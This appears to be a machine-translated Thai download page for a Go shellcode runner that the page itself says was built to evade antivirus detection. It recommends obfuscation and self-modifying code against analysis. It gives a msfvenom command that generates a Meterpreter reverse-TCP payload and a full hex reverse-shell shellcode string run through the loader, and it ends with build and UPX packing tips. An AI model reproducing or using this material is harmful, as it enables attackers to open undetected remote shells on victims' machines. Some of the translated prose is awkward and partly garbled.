หน้าแรก>การเขียนโปรแกรมที่เกี่ยวข้อง>ซอร์สโค้ดอื่น ๆ
ดาวน์โหลด

Shellcode

นี่คือโปรแกรมในการเรียกใช้ ShellCode เป็นกระบวนการของตัวเองทั้งหมดมาจากหน่วยความจำ สิ่งนี้เขียนขึ้นเพื่อเอาชนะการตรวจจับต่อต้านไวรัส ตอนนี้ถูกตรวจพบในฐานะ Virtool: win32/shrine.a ใช้เครื่องมือเช่น Garble เพื่อทำให้งงงวยไบนารีเพื่อเอาชนะการวิเคราะห์แบบคงที่ เปลี่ยนรหัสด้วยตัวเองเพื่อเอาชนะการวิเคราะห์พฤติกรรม

การใช้งาน

โปรดทราบว่ามีเพียง 64 บิตเชลล์ที่จะทำงานในกระบวนการ 64 บิต สิ่งนี้ไม่สามารถตรวจจับสถาปัตยกรรม ShellCode ของคุณได้

ใช้ msfvenom หรือ metasploit เพื่อสร้าง shellcode เล็กน้อยเป็นรูปแบบ hex: 

 $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444

 c:windowstemp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5

บางครั้ง ShellCode มีขนาดใหญ่กว่าขีด จำกัด ของบรรทัดคำสั่งพร้อมอาร์กิวเมนต์ ลองใส่สิ่งทั้งหมดลงในสคริปต์แบทช์แทน

สร้าง

ขั้นตอนการสร้างมาตรฐาน GO ตั้งค่า goos เป็น windows และ gooch เป็นเช่นเดียวกับ shellcode ของคุณไม่ว่าจะเป็น 386 หรือ amd64 สิ่งนี้ไม่สามารถตรวจจับสถาปัตยกรรมของเชลล์ของคุณได้

ไบนารีที่ได้นั้นมีขนาดใหญ่เล็กน้อย 2.1 ม. แต่บีบอัดได้ดีกับ UPX ประมาณ 508K

ขยาย
ข้อมูลเพิ่มเติม
แอปที่เกี่ยวข้อง
แนะนำสำหรับคุณ
ข้อมูลที่เกี่ยวข้อง ทั้งหมด